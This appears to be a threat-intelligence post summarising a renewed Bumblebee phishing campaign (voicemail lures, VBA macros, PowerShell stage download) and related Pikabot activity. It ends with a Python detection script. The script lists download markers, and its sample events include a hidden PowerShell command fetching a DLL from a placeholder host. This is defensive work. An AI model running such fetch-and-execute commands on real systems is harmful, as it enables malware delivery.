February 13, 2024 at 10:47AM
The Bumblebee malware, previously attributed to the cybercrime syndicates Conti and Trickbot, has resurfaced in phishing campaigns targeting organizations in the U.S. The recent campaign uses fake voicemail notifications and malicious documents with VBA macros to introduce the Bumblebee DLL into victims’ systems. This marks a departure from previous distribution methods and suggests the operators are testing new approaches. Additionally, other threat actors, such as TA579, TA576, TA866, TA582, and TA2541, have shown increased activity. The resurgence of malware loaders like Pikabot and the emergence of new variants, such as a simplified version of Pikabot, indicate a shift in the cybercrime landscape following the law enforcement disruption of QBot.
Key takeaways from the meeting notes are as follows:
1. The Bumblebee malware has reappeared after a four-month hiatus, spreading in phishing campaigns targeting numerous organizations in the United States.
2. This malware, developed as a replacement for the BazarLoader backdoor, is being distributed through fake voicemail notifications, using a OneDrive URL to download a Word document containing a VBA macro.
3. The VBA macro creates a script file, executing a PowerShell command that fetches and executes the next stage from a remote server, culminating in the deployment of the Bumblebee DLL on the victim’s system.
4. This campaign’s use of VBA macros is notable due to Microsoft’s decision to block macros by default in 2022, making it more challenging for the campaign to succeed.
5. Previous Bumblebee campaigns used different methods for payload delivery, but the current attack represents a significant departure, possibly due to evasion tactics or a focus on outdated systems.
6. Cybercriminals rent Bumblebee to introduce their payloads into already-compromised systems.
7. There is not enough evidence to attribute the recent campaign to a specific threat group, but it displays characteristics consistent with activity tracked as TA579.
8. Other threat actors showing increased activity include TA576, TA866, TA582, and TA2541.
9. The disruption of QBot by law enforcement has opened up opportunities for other malware, such as DarkGate and Pikabot, to fill the void in the payload distribution market.
10. Zscaler reported a resurgence of Pikabot with a new, simplified version following a hiatus after Christmas last year, indicating a revamped variant in the early release stage.
These clear takeaways provide a concise summary of the main points covered in the meeting notes.
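The delivery chain in takeaways 2 and 3 (Word document with a VBA macro, a dropped script file, a PowerShell command fetching the next stage) leaves a recognizable parent-child process pattern. The following is an added detection example, not code from the original report: it walks constructed process-creation events and flags download-capable PowerShell that descends from an Office process within two hops. Field names, the marker list and the sample events are assumptions to adapt to your own EDR or Sysmon schema; the direct Office-to-PowerShell variant it also catches is an assumed generalization, not something the report describes.

```python
# Added detection example (not from the original report). Event schema and
# sample telemetry below are constructed for illustration.
OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "cmd.exe"}   # dropped-script stage
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Command-line fragments suggesting a stage is fetched from a remote server.
# "-enc" can also match benign "-EncodedCommand"/"-Encoding" use; tune to taste.
FETCH_MARKERS = ("http://", "https://", "downloadstring", "invoke-webrequest", "iwr ", "-enc")

def image_name(path):
    """Lower-cased file name of a full Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()

def find_macro_chains(events):
    """Return (office_pid, powershell_pid) pairs where a PowerShell process with a
    download marker descends from an Office process via at most one script host."""
    parent_of = {e["pid"]: e["ppid"] for e in events}
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        if image_name(e["image"]) not in POWERSHELL:
            continue
        if not any(m in e["cmdline"].lower() for m in FETCH_MARKERS):
            continue
        pid = e["pid"]
        for _ in range(2):  # Office -> script host -> PowerShell, or Office -> PowerShell
            pid = parent_of.get(pid)
            if pid not in by_pid:
                break
            name = image_name(by_pid[pid]["image"])
            if name in OFFICE:
                hits.append((pid, e["pid"]))
                break
            if name not in SCRIPT_HOSTS:
                break  # unrelated ancestor, stop walking
    return hits

SAMPLE_EVENTS = [  # constructed sample telemetry; example.invalid is a placeholder host
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Program Files\Microsoft Office\WINWORD.EXE", "cmdline": "WINWORD.EXE voicemail.docm"},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\wscript.exe", "cmdline": r"wscript.exe C:\Users\Public\update.vbs"},
    {"pid": 400, "ppid": 300, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -c Invoke-WebRequest -Uri http://example.invalid/stage -OutFile stage.dll"},
    {"pid": 500, "ppid": 100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "cmdline": "powershell.exe Get-Date"},
]

if __name__ == "__main__":
    for office_pid, ps_pid in find_macro_chains(SAMPLE_EVENTS):
        print(f"ALERT: Office pid {office_pid} led to download-capable PowerShell pid {ps_pid}")
```

The benign PowerShell event (pid 500) is ignored because it carries no fetch marker and has no Office ancestor; only the macro chain ending in pid 400 is reported.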